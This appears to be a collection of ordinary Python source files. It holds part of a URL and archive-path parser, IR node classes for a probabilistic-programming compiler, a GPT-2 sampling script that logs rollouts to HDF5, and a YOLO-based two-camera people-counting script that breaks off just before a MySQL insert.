            # Keep the host as part of the archive location.
            archive = parts.netloc + archive
    else:
        parts = urlparse(path)
        scheme = parts.scheme
        path = parts.path
        if parts.netloc and parts.netloc != 'localhost':
            if scheme.split("+")[-1] in CURLSCHEMES:
                # We need to deal with cases such as zip+https://server.com/data.zip
                path = "{}://{}{}".format(scheme.split("+")[-1], parts.netloc, path)
            else:
                path = parts.netloc + path
        if scheme in SCHEMES:
            # Single-scheme URL may embed an "archive!inner_path" split.
            parts = path.split('!')
            path = parts.pop() if parts else None
            archive = parts.pop() if parts else None
    # Normalize the empty-string scheme urlparse returns to None.
    scheme = None if not scheme else scheme
    return path, scheme, archive
|
import warnings
from itertools import chain
class IRMeta(type):
    """Metaclass implementing the visitor pattern for IR nodes.

    For every class it creates, it generates (via exec) an
    ``accept(self, visitor)`` method that dispatches to
    ``visitor.visit<ClassName>(self)``.
    """
    def __init__(cls, *args, **kwargs):
        selector = 'return visitor.visit{}(self)'.format(cls.__name__)
        accept_code = "def accept(self, visitor):\n\t{}".format(selector)
        l = {}
        # Compile the per-class accept() and attach it to the new class.
        exec(accept_code, globals(), l)
        setattr(cls, "accept", l["accept"])
class IR(metaclass=IRMeta):
    """Base class of all IR nodes.

    The IRMeta metaclass equips every subclass with an
    ``accept(visitor)`` method for double dispatch. The ``is_*``
    predicates default to False and are overridden by the relevant
    subclasses.
    """
    def is_variable_decl(self):
        return False
    def is_property(self):
        return False
    def is_variable(self):
        return False
    def is_net_var(self):
        return False
    def is_tuple(self):
        return False
    @property
    def children(self):
        # Leaf nodes have no children; composite nodes override.
        return []
    @children.setter
    def children(self, children):
        assert not children, "Setting children to object without children"
    def ensureReal(self):
        # Default coercion hook: warn and do nothing; value-carrying
        # subclasses (Constant, Constraint) override.
        warnings.warn("don't know how to ensure Real", Warning)
        return True
    def ensureInt(self):
        warnings.warn("don't know how to ensure Int", Warning)
        return True
class Program(IR):
    """Root IR node: a collection of named top-level blocks.

    Each block is stored as an attribute named after its blockName()
    (e.g. ``self.model``); slots that were never set remain None.
    """
    def __init__(self, body = None):
        # BUG FIX: the original default was a shared mutable list ([]),
        # aliased across every Program() created without arguments.
        super(Program, self).__init__()
        body = [] if body is None else body
        self.body = body
        self.initBlocksNone()
        self.addBlocks(body)
    def initBlocksNone(self):
        """Initialize every known block slot to None."""
        for name in self.blockNames():
            setattr(self, name, None)
    @property
    def children(self):
        return self.blocks()
    @children.setter
    def children(self, blocks):
        self.addBlocks(blocks)
    def addBlocks(self, blocks):
        """Attach each block under its blockName(); each kind of block may
        only be set once per program."""
        for block in blocks:
            name = block.blockName()
            if getattr(self, name) is not None:
                assert False, "trying to set :{} twice.".format(name)
            setattr(self, name, block)
    def blocks(self):
        ## impose an evaluation order
        for name in self.blockNames():
            block = getattr(self, name, None)
            if block is not None:
                yield block
    def blockNames(self):
        """Block attribute names, in evaluation order."""
        return [
            'networksblock', 'data', 'transformeddata', 'parameters', 'transformedparameters', \
            'guideparameters', \
            'guide', 'prior', 'model', 'generatedquantities' ]
class ProgramBlocks(IR):
    """Base class for top-level program blocks (data, model, guide, ...).

    The ``is_*`` predicates all default to False here and are overridden
    by the corresponding subclass.
    """
    def __init__(self, body = None):
        # BUG FIX: the original default was a shared mutable list ([]).
        super(ProgramBlocks, self).__init__()
        self.body = [] if body is None else body
        self._nets = []
        self._blackBoxNets = set()
    def __eq__(self, other):
        """Basic equality"""
        return self.children == other.children
    @property
    def children(self):
        return self.body
    @children.setter
    def children(self, body):
        self.body = body
    @classmethod
    def blockName(cls):
        """Lowercased class name; used as the attribute key on Program."""
        return cls.__name__.lower()
    def is_data(self):
        return False
    def is_transformed_data(self):
        return False
    def is_transformed_parameters(self):
        return False
    def is_model(self):
        return False
    def is_guide(self):
        return False
    def is_networks(self):
        # BUG FIX: the base class returned True here while every other
        # predicate defaults to False and NetworksBlock overrides this
        # with True; the base must return False.
        return False
    def is_guide_parameters(self):
        return False
    def is_prior(self):
        return False
    def is_parameters(self):
        return False
    def is_generated_quantities(self):
        return False
class SamplingBlock(ProgramBlocks):
    """A program block where sampling is a valid statement """
    def __init__(self, body = None):
        # BUG FIX: avoid a shared mutable default list for `body`.
        super(SamplingBlock, self).__init__(body = [] if body is None else body)
        # Variables that have been sampled in this block.
        self._sampled = set()
    def addSampled(self, variable):
        """Record that *variable* was sampled in this block."""
        self._sampled.add(variable)
class Model(SamplingBlock):
    """The `model` program block."""
    def is_model(self):
        return True
class Guide(SamplingBlock):
    """The `guide` program block."""
    def is_guide(self):
        return True
class Prior(SamplingBlock):
    """The `prior` program block."""
    def is_prior(self):
        return True
class GuideParameters(ProgramBlocks):
    """The `guide parameters` program block."""
    def is_guide_parameters(self):
        return True
class NetworksBlock(ProgramBlocks):
    """Block of neural-network declarations; `decls` aliases `body`."""
    def __init__(self, decls = None):
        super(NetworksBlock, self).__init__(body = decls)
    @property
    def decls(self):
        return self.body
    @decls.setter
    def decls(self, decls):
        self.body = decls
    def is_networks(self):
        return True
class Parameters(ProgramBlocks):
    """The `parameters` program block."""
    def is_parameters(self):
        return True
class Data(ProgramBlocks):
    """The `data` program block."""
    def is_data(self):
        return True
class TransformedData(ProgramBlocks):
    """The `transformed data` program block."""
    def is_transformed_data(self):
        return True
class TransformedParameters(ProgramBlocks):
    """The `transformed parameters` program block."""
    def is_transformed_parameters(self):
        return True
class GeneratedQuantities(ProgramBlocks):
    """The `generated quantities` program block."""
    def is_generated_quantities(self):
        return True
class Statements(IR):
    """Base class for all statement nodes."""
    pass
class AssignStmt(Statements):
    """Assignment `target = value`, with optional constraints."""
    def __init__(self, target = None, value = None, constraints = None):
        super(AssignStmt, self).__init__()
        self.target = target
        self.value = value
        self.constraints = constraints
    @property
    def children(self):
        # NOTE: `constraints` is deliberately not part of `children`.
        return [self.target, self.value]
    @children.setter
    def children(self, children):
        [self.target, self.value] = children
class SamplingStmt(Statements):
    """Sampling statement `target ~ id(args)` with an optional shape."""
    def __init__(self, target = None, id = None, args = None, shape = None):
        super(SamplingStmt, self).__init__()
        self.target = target
        self.id = id
        self.args = args
        self.shape = shape
    @property
    def children(self):
        # Generic child traversal is disabled on purpose: visitors must
        # handle sampling statements explicitly.
        assert False, "SamplingStmt.children should not be called"
        # return [self.target,] + self.args + ([self.shape] if self.shape else [])
    # @children.setter
    # def children(self, children):
    #     self.target = children[0]
    #     self.args = children[1:]
class SamplingDeclaration(SamplingStmt):
    """Sampling statement in declaration position."""
    pass
class SamplingObserved(SamplingStmt):
    """Sampling statement over observed data."""
    pass
class SamplingParameters(SamplingStmt):
    """Sampling statement over parameters."""
    pass
class SamplingFactor(SamplingStmt):
    """
    Like observe but without distribution,
    just the log-density.
    This behavior is achieved using the following identity:
    ```
    target += exp == -exp ~ exponential(1)
    ```
    """
    def __init__(self, target = None):
        super(SamplingFactor, self).__init__(target = target,
                                             id = None,
                                             args = [],
                                             shape = None)
class ForStmt(Statements):
    """Loop `for id in from_ .. to_: body`."""
    def __init__(self, id = None, from_ = None, to_ = None, body = None):
        super(ForStmt, self).__init__()
        self.id = id
        self.from_ = from_
        self.to_ = to_
        self.body = body
    @property
    def children(self):
        # The loop variable `id` is not a traversed child.
        return [self.from_, self.to_, self.body]
    @children.setter
    def children(self, children):
        [self.from_, self.to_, self.body] = children
class ConditionalStmt(Statements):
    """Conditional `if test: true else: false`."""
    def __init__(self, test = None, true = None, false = None):
        super(ConditionalStmt, self).__init__()
        self.test = test
        self.true = true
        self.false = false
    @property
    def children(self):
        return [self.test, self.true, self.false]
    @children.setter
    def children(self, children):
        [self.test, self.true, self.false] = children
class WhileStmt(Statements):
    """Loop `while test: body`."""
    def __init__(self, test = None, body = None):
        super(WhileStmt, self).__init__()
        self.test = test
        self.body = body
    @property
    def children(self):
        return [self.test, self.body]
    @children.setter
    def children(self, children):
        [self.test, self.body] = children
class BlockStmt(Statements):
    """A sequence of statements treated as one block."""
    def __init__(self, body = None):
        super(BlockStmt, self).__init__()
        self.body = body
    @property
    def children(self):
        return self.body
    @children.setter
    def children(self, children):
        self.body = children
class CallStmt(Statements):
    """Call of function `id` with an argument collection `args`."""
    def __init__(self, id = None, args = None):
        super(CallStmt, self).__init__()
        self.id = id
        self.args = args
    @property
    def children(self):
        return [self.args]
    @children.setter
    def children(self, children):
        [self.args,] = children
    def __str__(self):
        # Render as "id(a1,a2,...)". Uses str.join instead of the
        # original quadratic string-concatenation loop; output is
        # identical.
        rendered_args = ",".join(str(a) for a in self.args.children)
        return str(self.id) + "(" + rendered_args + ")"
class BreakStmt(Statements):
    """`break` statement."""
    pass
class ContinueStmt(Statements):
    """`continue` statement."""
    pass
class Expression(Statements):
    """Base class for expressions.

    Each block-membership predicate holds iff it holds for every child
    of the expression (vacuously True for leaves with no children).
    """
    def is_data_var(self):
        return all(x.is_data_var() for x in self.children)
    def is_transformed_data_var(self):
        return all(x.is_transformed_data_var() for x in self.children)
    def is_transformed_parameters_var(self):
        return all(x.is_transformed_parameters_var() for x in self.children)
    def is_params_var(self):
        # BUG FIX: this and the next three predicates returned a bare
        # generator expression, which is always truthy; wrap in all()
        # like the predicates above.
        return all(x.is_params_var() for x in self.children)
    def is_guide_var(self):
        return all(x.is_guide_var() for x in self.children)
    def is_guide_parameters(self):
        return all(x.is_guide_parameters_var() for x in self.children)
    def is_prior_var(self):
        return all(x.is_prior_var() for x in self.children)
    def is_generated_quantities_var(self):
        return all(x.is_generated_quantities_var() for x in self.children)
class Constant(Expression):
    """Literal numeric constant."""
    def __init__(self, value = None):
        super(Constant, self).__init__()
        self.value = value
    def ensureInt(self):
        # Coerce the stored literal to int.
        self.value = int(self.value)
    def ensureReal(self):
        # Coerce the stored literal to float.
        self.value = float(self.value)
class Tuple(Expression):
    """Tuple of expressions."""
    def __init__(self, exprs = None):
        super(Tuple, self).__init__()
        self.exprs = exprs
    def is_tuple(self):
        return True
    @property
    def children(self):
        return self.exprs
    @children.setter
    def children(self, children):
        self.exprs = children
class Str(Expression):
    """String literal."""
    def __init__(self, value = None):
        super(Str, self).__init__()
        self.value = value
class List(Expression):
    """Literal list of element expressions."""
    def __init__(self, elements = None):
        # BUG FIX: the original default was a shared mutable list ([]),
        # aliased across every List() created without arguments.
        super(List, self).__init__()
        self.elements = [] if elements is None else elements
    @property
    def children(self):
        return self.elements
    @children.setter
    def children(self, children):
        self.elements = children
class BinaryOperator(Expression):
    """Binary expression `left op right`; `op` is an Operator node."""
    def __init__(self, left = None, op = None, right = None):
        super(BinaryOperator, self).__init__()
        self.left = left
        self.right = right
        self.op = op
    @property
    def children(self):
        return [self.left, self.right, self.op]
    @children.setter
    def children(self, children):
        [self.left, self.right, self.op] = children
class UnaryOperator(Expression):
    """Unary expression `op value`; `op` is a UOperator node."""
    def __init__(self, value = None, op = None):
        super(UnaryOperator, self).__init__()
        self.value = value
        self.op = op
    @property
    def children(self):
        return [self.value, self.op]
    @children.setter
    def children(self, children):
        [self.value, self.op] = children
class Subscript(Expression):
    """Indexing expression `id[index]`.

    Block-membership predicates delegate to the subscripted expression
    only (the index is ignored).
    """
    def __init__(self, id = None, index = None):
        super(Subscript, self).__init__()
        self.id = id
        self.index = index
    @property
    def children(self):
        return [self.id, self.index]
    @children.setter
    def children(self, children):
        [self.id, self.index] = children
    def is_data_var(self):
        return self.id.is_data_var()
    def is_transformed_data_var(self):
        return self.id.is_transformed_data_var()
    def is_transformed_parameters_var(self):
        return self.id.is_transformed_parameters_var()
    def is_params_var(self):
        return self.id.is_params_var()
    def is_guide_var(self):
        return self.id.is_guide_var()
    def is_guide_parameters_var(self):
        return self.id.is_guide_parameters_var()
    def is_prior_var(self):
        return self.id.is_prior_var()
    def is_generated_quantities_var(self):
        return self.id.is_generated_quantities_var()
class VariableDecl(IR):
    """Declaration of a variable with optional dimensions, initializer and
    type; boolean flags record which program block declared it."""
    def __init__(self, id = None, dim = None, init = None,
                 type_ = None):
        super(VariableDecl, self).__init__()
        self.id = id
        self.dim = dim
        self.init = init
        self.data = False
        self.parameters = False
        self.transformed_parameters = False
        self.transformed_data = False
        self.generated_quantities = False
        self.type_ = type_
    def is_variable_decl(self):
        return True
    def set_data(self):
        self.data = True
    def set_parameters(self):
        self.parameters = True
    def set_transformed_parameters(self):
        self.transformed_parameters = True
    def set_transformed_data(self):
        self.transformed_data = True
    def set_generated_quantities(self):
        """Mark this declaration as a generated quantity."""
        self.generated_quantities = True
    # The original method name was misspelled; keep it as an alias so
    # existing callers continue to work.
    set_generated_quatities = set_generated_quantities
    @property
    def children(self):
        return [self.dim, self.init, self.type_]
    @children.setter
    def children(self, children):
        [self.dim, self.init, self.type_] = children
class Type_(IR):
    """Type of a declaration (int/real/vector/matrix), with optional
    constraints, array-ness, and dimensions.

    On construction, every constraint value is coerced to the numeric
    kind implied by the type.
    """
    def __init__(self, type_ = None, constraints = None, is_array = False, dim = None):
        super(Type_, self).__init__()
        self.type_ = type_
        self.constraints = constraints or []
        self.is_array = is_array
        self.dim = dim
        if self.constraints:
            if self.type_ == 'int':
                coerce = lambda x: x.ensureInt()
            elif self.type_ in ('real', 'vector', 'matrix'):
                # All three carry real-valued constraints.
                coerce = lambda x: x.ensureReal()
            else:
                assert False, f"Unknown type: {self.type_}"
            # Plain loop: the original used a list comprehension purely
            # for its side effects.
            for constraint in self.constraints:
                coerce(constraint)
    @property
    def children(self):
        return self.constraints
    @children.setter
    def children(self, constraints):
        self.constraints = constraints
class Constraint(IR):
    """A single type constraint of kind `sort` with expression `value`
    (coercions are forwarded to the value expression)."""
    def __init__(self, sort = None, value = None):
        super(Constraint, self).__init__()
        self.sort = sort
        self.value = value
    def ensureReal(self):
        self.value.ensureReal()
    def ensureInt(self):
        self.value.ensureInt()
    @property
    def children(self):
        return [self.value, ]
    @children.setter
    def children(self, values):
        self.value, = values
class Variable(Expression):
    """Named variable reference.

    `block_name` records which program block declared the variable and
    drives the block-membership predicates below (set after resolution;
    None until then).
    """
    def __init__(self, id = None):
        super(Variable, self).__init__()
        self.id = id
        self.block_name = None
    def __str__(self):
        return str(self.id)
    def __eq__(self, other):
        # Equality is by identifier only (block_name is ignored).
        return isinstance(other, Variable) and \
               self.id == other.id
    def is_variable(self):
        return True
    def is_data_var(self):
        return self.block_name == Data.blockName()
    def is_transformed_data_var(self):
        return self.block_name == TransformedData.blockName()
    def is_params_var(self):
        return self.block_name == Parameters.blockName()
    def is_transformed_parameters_var(self):
        return self.block_name == TransformedParameters.blockName()
    def is_guide_var(self):
        return self.block_name == Guide.blockName()
    def is_guide_parameters_var(self):
        return self.block_name == GuideParameters.blockName()
    def is_prior_var(self):
        return self.block_name == Prior.blockName()
    def is_generated_quantities_var(self):
        return self.block_name == GeneratedQuantities.blockName()
class VariableProperty(Expression):
    """Property access `var.prop` (e.g. `x.shape`)."""
    def __init__(self, var = None, prop = None):
        super(VariableProperty, self).__init__()
        self.var = var
        self.prop = prop
    def is_property(self):
        return True
class AnonymousShapeProperty(VariableProperty):
    """`.shape` property of a freshly generated anonymous variable
    (anon0, anon1, ...)."""
    @classmethod
    def newvar(cls):
        # Class-level counter produces unique anonymous names.
        if hasattr(cls, 'counter'):
            cls.counter = cls.counter+1
        else:
            cls.counter = 0
        return Variable(id="anon"+str(cls.counter))
    def __init__(self):
        super(AnonymousShapeProperty, self).__init__(var = AnonymousShapeProperty.newvar(), prop="shape")
class NetVariableProperty(VariableProperty):
    """Property access on a network variable."""
    pass
class NetDeclaration(IR):
    """Declaration of a neural network `name` of class `cls` with
    constructor parameters `params`."""
    def __init__(self, name = None, cls = None, params = None):
        # BUG FIX: the original default for `params` was a shared
        # mutable list ([]).
        super(NetDeclaration, self).__init__()
        self.name = name
        self.net_cls = cls
        self.params = [] if params is None else params
class NetVariable(Expression):
    """Reference to a (possibly nested) parameter of a declared network."""
    def __init__(self, name = None, ids = None):
        # BUG FIX: the original default for `ids` was a shared mutable
        # list ([]).
        super(NetVariable, self).__init__()
        self.name = name
        self.ids = [] if ids is None else ids
        self.block_name = None
    @property
    def id(self):
        """Dotted path 'name.id1.id2...'."""
        return '.'.join(chain([self.name], self.ids))
    def is_net_var(self):
        return True
class Operator(Expression):
    """Base class for binary operator tags."""
    pass
class Plus(Operator):
    """Binary +."""
    pass
class Minus(Operator):
    """Binary -."""
    pass
class Pow(Operator):
    """Exponentiation."""
    pass
class Mult(Operator):
    """Multiplication."""
    pass
class DotMult(Operator):
    """Elementwise multiplication."""
    pass
class Div(Operator):
    """Division."""
    pass
class DotDiv(Operator):
    """Elementwise division."""
    pass
class And(Operator):
    """Logical and."""
    pass
class Or(Operator):
    """Logical or."""
    pass
class LE(Operator):
    """Less than or equal."""
    pass
class GE(Operator):
    """Greater than or equal."""
    pass
class LT(Operator):
    """Less than."""
    pass
class GT(Operator):
    """Greater than."""
    pass
class EQ(Operator):
    """Equality comparison."""
    pass
class UOperator(Operator):
    """Unary operators."""
class UPlus(UOperator):
    """Unary +."""
    pass
class UMinus(UOperator):
    """Unary -."""
    pass
class UNot(UOperator):
    """Unary logical not."""
    pass
|
from transformers import GPT2LMHeadModel, GPT2Tokenizer, GPT2Config
import torch
import torch.nn
import torch.distributions
import torch.nn.functional as F
import random
import numpy as np
import pickle
from utils import rand_gen_first_token
import h5py
# Sampling / rollout configuration.
END_TOKEN = '<|endoftext|>'
fname = 'sampling.txt'   # text output file
MAX_LENGTH = 994         # per-episode token cap
N_EPS = 100              # number of episodes to generate
FILEPATH = 'sampling'    # HDF5 output basename
# GPT-2 with hidden states exposed (presumably for the commented-out
# embedding logging in gen_episode -- confirm before removing).
tokenizer = GPT2Tokenizer.from_pretrained("gpt2")
config = GPT2Config()
config.output_hidden_states = True
model = GPT2LMHeadModel.from_pretrained('gpt2', config=config)
#device = torch.device("cuda" if args.cuda else "cpu")
def gen_episode(outf, f, eps):
    """Sample one text episode from GPT-2 and record it.

    Writes the decoded text to *outf* and per-step rollout data (state
    tokens, chosen actions, probabilities, rewards) into HDF5 group
    'eps<eps>' of the open file *f*. The per-step reward is the model's
    probability of the chosen token.
    """
    model.eval()
    reward_sum = 0.0
    data = f.create_group('eps' + str(eps))
    dt = h5py.string_dtype(encoding='ascii')
    data.create_dataset('state', (MAX_LENGTH,), dtype=dt)
    data.create_dataset('final_reward', (1,), dtype='f')
    data.create_dataset('final_length', (1,), dtype='i')
    #data.create_dataset('emb_state', (MAX_LENGTH, 768), dypte='f')
    data.create_dataset('action', (MAX_LENGTH,), dtype='i')
    data.create_dataset('prob', (MAX_LENGTH,), dtype='f')
    data.create_dataset('reward', (MAX_LENGTH,), dtype='f')
    # Random first token plus the model's cached hidden state.
    generated, past = rand_gen_first_token(model, tokenizer, device=None)
    f['eps' + str(eps)]['state'][0] = tokenizer.decode(generated[-1])
    #f['eps' + str(eps)]['emb_state'][0] = past
    length = 0
    context = torch.tensor([generated])
    # Sample until the end-of-text token or the length cap is reached.
    while generated[-1] != tokenizer.encode([END_TOKEN])[0] and length < MAX_LENGTH-1:
        logits, past, _ = model(context, past=past)
        # Top-100 nucleus of the softmax; sample the next token from it.
        if len(logits.shape) > 2:
            topk = torch.topk(F.softmax(logits[...,-1,:], 1),100)
        else:
            topk = torch.topk(F.softmax(logits, 1), 100)
        token_idx = torch.multinomial(topk.values, 1).item()
        token = topk.indices[0,token_idx].item()
        generated += [token]
        context = torch.tensor([token])
        # NOTE(review): `sequence` re-decodes the whole episode every step
        # and is unbound if the loop never runs -- confirm intent.
        sequence = tokenizer.decode(generated)
        f['eps' +str(eps)]['state'][length+1] = tokenizer.decode(generated[-1])
        #f['eps' + str(eps)]['emb_state'][length+1] = past
        f['eps' + str(eps)]['action'][length] = token_idx
        if len(F.softmax(logits[...,-1,:]).shape) == 2:
            prob_reward = F.softmax(logits[...,-1,:])[:,token].item()
        else:
            prob_reward = F.softmax(logits[...,-1,:])[token].item()
        f['eps' + str(eps)]['prob'][length] = prob_reward
        f['eps' + str(eps)]['reward'][length] = prob_reward
        reward_sum += prob_reward
        length += 1
    outf.write(sequence)
    f['eps' + str(eps)]['final_reward'][0] = reward_sum
    f['eps' + str(eps)]['final_length'][0] = length
    # NOTE(review): the loop bounds length at MAX_LENGTH-1, so this
    # truncation penalty appears unreachable -- confirm the intended
    # threshold.
    if length >= MAX_LENGTH:
        f['eps' + str(eps)]['final_reward'][0] -= 100
        f['eps' + str(eps)]['reward'][-1] -= 100
    outf.write(END_TOKEN)
# Generate N_EPS episodes, writing decoded text to `fname` and rollout
# data to '<FILEPATH>.hdf5'. Both files are managed by context managers
# so they are closed even if an episode raises (the original leaked the
# HDF5 handle on error).
with open(fname, 'w') as outf, h5py.File(FILEPATH + '.hdf5', 'w') as f:
    for i in range(N_EPS):
        gen_episode(outf, f, i)
        print('END OF EPS')
print('END OF OUTF')
|
import cv2 as cv
import numpy as np
import datetime
import mysql.connector
from centroid import CentroidTracker
from trackable import TrackableObject
# Global up/down crossing counters for the two camera feeds; updated by
# the nested counting()/counting2() helpers inside main().
Down1 = 0
Up1 = 0
Down2 = 0
Up2 = 0
def main():
    """People counting over two video feeds with YOLOv3-tiny.

    Detects persons in each frame, tracks them with a centroid tracker,
    counts up/down crossings of two horizontal lines per feed, shows both
    annotated feeds side by side, and on exit ('d' key) inserts the totals
    into the `aisles` MySQL table.
    """
    whT = 320               # YOLO network input size
    confidenceThres = 0.4   # detection confidence threshold
    nmsThreshold = 0.3      # non-maximum-suppression threshold
    cap = cv.VideoCapture("test.mp4")
    cap2 = cv.VideoCapture("TestVideo.avi")
    classesFile = "coco-names.txt"
    classes = []
    with open(classesFile,'rt') as f:
        classes = f.read().rstrip('\n').split('\n')
    modelConfig = "yolov3-tiny.cfg"
    modelWeights = "yolov3-tiny.weights"
    net = cv.dnn.readNetFromDarknet(modelConfig,modelWeights)
    net.setPreferableBackend(cv.dnn.DNN_BACKEND_OPENCV)
    net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)
    # NOTE(review): one tracker and one trackableObjects map are shared
    # by BOTH feeds, so object IDs are mixed between cameras -- confirm
    # this is intended.
    ct = CentroidTracker(maxDisappeared=40, maxDistance=50)
    trackers = []  # unused
    trackableObjects = {}
    def counting(objects):
        # Update tracks for feed 1 and count crossings of the lines at
        # 3/20 and 17/20 of the frame height (+/- 30 px tolerance).
        # `img` is the current feed-1 frame, taken from the enclosing scope.
        frameHeight = img.shape[0]
        frameWidth = img.shape[1]
        global Down1
        global Up1
        for (objectID, centroid) in objects.items():
            to = trackableObjects.get(objectID, None)
            if to is None:
                to = TrackableObject(objectID, centroid)
            else:
                # direction < 0: moving up; > 0: moving down (image coords).
                y = [c[1] for c in to.centroids]
                direction = centroid[1] - np.mean(y)
                to.centroids.append(centroid)
                if not to.counted:
                    if direction < 0 and centroid[1] in range((frameHeight*17)//20 - 30, (frameHeight*17)//20 + 30):
                        Up1 += 1
                        to.counted = True
                    elif direction > 0 and centroid[1] in range((frameHeight*3)//20 - 30, (frameHeight*3)//20 + 30):
                        Down1 += 1
                        to.counted = True
            trackableObjects[objectID] = to
            cv.circle(img, (centroid[0], centroid[1]), 4, (0, 255, 0), -1)
        # Overlay running counters on the frame.
        info = [
            ("Up", Up1),
            ("Down", Down1),
        ]
        for (i, (k, v)) in enumerate(info):
            text = "{}: {}".format(k, v)
            cv.putText(img, text, (10, frameHeight - ((i * 20) + 20)),
                cv.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
    def findObjects(outputs,img):
        # Convert raw YOLO outputs to boxes, keep confident "person"
        # detections after NMS, feed them to the tracker and counter.
        hT,wT,cT = img.shape
        bbox = []
        classIds = []
        confs = []
        rects = []
        for output in outputs:
            for det in output:
                scores = det[5:]
                classId = np.argmax(scores)
                confidence = scores[classId]
                if confidence > confidenceThres:
                    # YOLO gives center/size relative to the frame.
                    w,h = int(det[2]*wT), int(det[3]*hT)
                    x,y = int((det[0]*wT) - w/2),int((det[1]*hT) - h/2)
                    bbox.append([x,y,w,h])
                    classIds.append(classId)
                    confs.append(float(confidence))
        indices = cv.dnn.NMSBoxes(bbox,confs,confidenceThres,nmsThreshold)
        for i in indices:
            # NOTE(review): `i[0]` assumes the nested index format of
            # older OpenCV releases; newer versions return flat indices.
            i = i[0]
            box = bbox[i]
            x,y,w,h = box[0],box[1],box[2],box[3]
            if classes[classIds[i]].upper() == "PERSON":
                cv.rectangle(img,(x,y),(x+w,y+h),(255,0,0),thickness=2)
                cv.putText(img,f'{classes[classIds[i]].upper()} {int(confs[i]*100)}%',(x,y-10),cv.FONT_HERSHEY_SIMPLEX,
                    0.6,(255,255,0),thickness = 2)
                rects.append((x,y,x+w,y+h))
        objects = ct.update(rects)
        counting(objects)
        # Timestamp overlay (date then time).
        x = datetime.datetime.now()
        cv.putText(img,f'{x.strftime("%x")}',(10,65),cv.FONT_HERSHEY_SIMPLEX,0.6,(0,255,0),thickness=2)
        cv.putText(img,f'{x.strftime("%X")}',(10,95),cv.FONT_HERSHEY_SIMPLEX,0.6,(0,255,0),thickness=2)
    def counting2(objects):
        # Same as counting(), but for feed 2 (img2 / Up2 / Down2).
        frameHeight = img2.shape[0]
        frameWidth = img2.shape[1]
        global Down2
        global Up2
        for (objectID, centroid) in objects.items():
            to = trackableObjects.get(objectID, None)
            if to is None:
                to = TrackableObject(objectID, centroid)
            else:
                y = [c[1] for c in to.centroids]
                direction = centroid[1] - np.mean(y)
                to.centroids.append(centroid)
                if not to.counted:
                    if direction < 0 and centroid[1] in range((frameHeight*17)//20 - 30, (frameHeight*17)//20 + 30):
                        Up2 += 1
                        to.counted = True
                    elif direction > 0 and centroid[1] in range((frameHeight*3)//20 - 30, (frameHeight*3)//20 + 30):
                        Down2 += 1
                        to.counted = True
            trackableObjects[objectID] = to
            cv.circle(img2, (centroid[0], centroid[1]), 4, (0, 255, 0), -1)
        info = [
            ("Up", Up2),
            ("Down", Down2),
        ]
        for (i, (k, v)) in enumerate(info):
            text = "{}: {}".format(k, v)
            cv.putText(img2, text, (10, frameHeight - ((i * 20) + 20)),
                cv.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
    def findObjects2(outputs2,img2):
        # Same as findObjects(), but for feed 2.
        hT,wT,cT = img2.shape
        bbox = []
        classIds = []
        confs = []
        rects = []
        for output in outputs2:
            for det in output:
                scores = det[5:]
                classId = np.argmax(scores)
                confidence = scores[classId]
                if confidence > confidenceThres:
                    w,h = int(det[2]*wT), int(det[3]*hT)
                    x,y = int((det[0]*wT) - w/2),int((det[1]*hT) - h/2)
                    bbox.append([x,y,w,h])
                    classIds.append(classId)
                    confs.append(float(confidence))
        indices = cv.dnn.NMSBoxes(bbox,confs,confidenceThres,nmsThreshold)
        for i in indices:
            i = i[0]
            box = bbox[i]
            x,y,w,h = box[0],box[1],box[2],box[3]
            if classes[classIds[i]].upper() == "PERSON":
                cv.rectangle(img2,(x,y),(x+w,y+h),(255,0,0),thickness=2)
                cv.putText(img2,f'{classes[classIds[i]].upper()} {int(confs[i]*100)}%',(x,y-10),cv.FONT_HERSHEY_SIMPLEX,
                    0.6,(255,255,0),thickness = 2)
                rects.append((x,y,x+w,y+h))
        objects = ct.update(rects)
        counting2(objects)
        x = datetime.datetime.now()
        cv.putText(img2,f'{x.strftime("%x")}',(10,65),cv.FONT_HERSHEY_SIMPLEX,0.6,(0,255,0),thickness=2)
        cv.putText(img2,f'{x.strftime("%X")}',(10,95),cv.FONT_HERSHEY_SIMPLEX,0.6,(0,255,0),thickness=2)
    # Main loop: read a frame from each feed, detect/track/count, and
    # display both annotated frames side by side until 'd' is pressed.
    while(True):
        # NOTE(review): `success` is never checked -- a finished video
        # makes img None and img.shape raise. Confirm and guard upstream.
        success,img = cap.read()
        frameHeight = img.shape[0]
        frameWidth = img.shape[1]
        # Counting lines for feed 1.
        cv.line(img, (0, (frameHeight*3) // 20), (frameWidth, (frameHeight*3) // 20), (255, 255, 255), 2)
        cv.line(img, (0, (frameHeight*17) // 20), (frameWidth, (frameHeight*17) // 20), (255, 255, 255), 2)
        blob = cv.dnn.blobFromImage(img,1/255,(whT,whT),[0,0,0],1,crop=False)
        net.setInput(blob)
        layerNames = net.getLayerNames()
        outputNames = [layerNames[i[0]-1] for i in net.getUnconnectedOutLayers()]
        outputs = net.forward(outputNames)
        findObjects(outputs,img)
        resized = cv.resize(img,(550,550),interpolation = cv.INTER_AREA)
        # Second feed, same pipeline.
        success2,img2 = cap2.read()
        frameHeight2 = img2.shape[0]
        frameWidth2 = img2.shape[1]
        cv.line(img2, (0, (frameHeight2*3) // 20), (frameWidth2, (frameHeight2*3) // 20), (255, 255, 255), 2)
        cv.line(img2, (0, (frameHeight2*17) // 20), (frameWidth2, (frameHeight2*17) // 20), (255, 255, 255), 2)
        blob2 = cv.dnn.blobFromImage(img2,1/255,(whT,whT),[0,0,0],1,crop=False)
        net.setInput(blob2)
        layerNames2 = net.getLayerNames()
        outputNames2 = [layerNames2[i[0]-1] for i in net.getUnconnectedOutLayers()]
        outputs2 = net.forward(outputNames2)
        findObjects2(outputs2,img2)
        resized2 = cv.resize(img2,(550,550),interpolation = cv.INTER_AREA)
        # Side-by-side display of both feeds.
        Hori = np.concatenate((resized, resized2), axis=1)
        cv.imshow("Image",Hori)
        # Totals and date captured each iteration; the last values are
        # used for the DB insert after the loop exits.
        total1 = Up1+Down1
        total2 = Up2+Down2
        t = datetime.datetime.now()
        day = t.strftime("%Y-%m-%d")
        if cv.waitKey(20) & 0xFF==ord('d'):
            break
    cap.release()
    cv.destroyAllWindows()
    # Persist the final totals for the day.
    db = mysql.connector.connect(
        host = "localhost",
        user = "root",
        password = "root",
        database = "mydatabase"
    )
    mycursor = db.cursor()
    sql = "INSERT INTO aisles (A1, A2, Day) VALUES (%s, %s, %s)"
    val = (total1,total2,day)
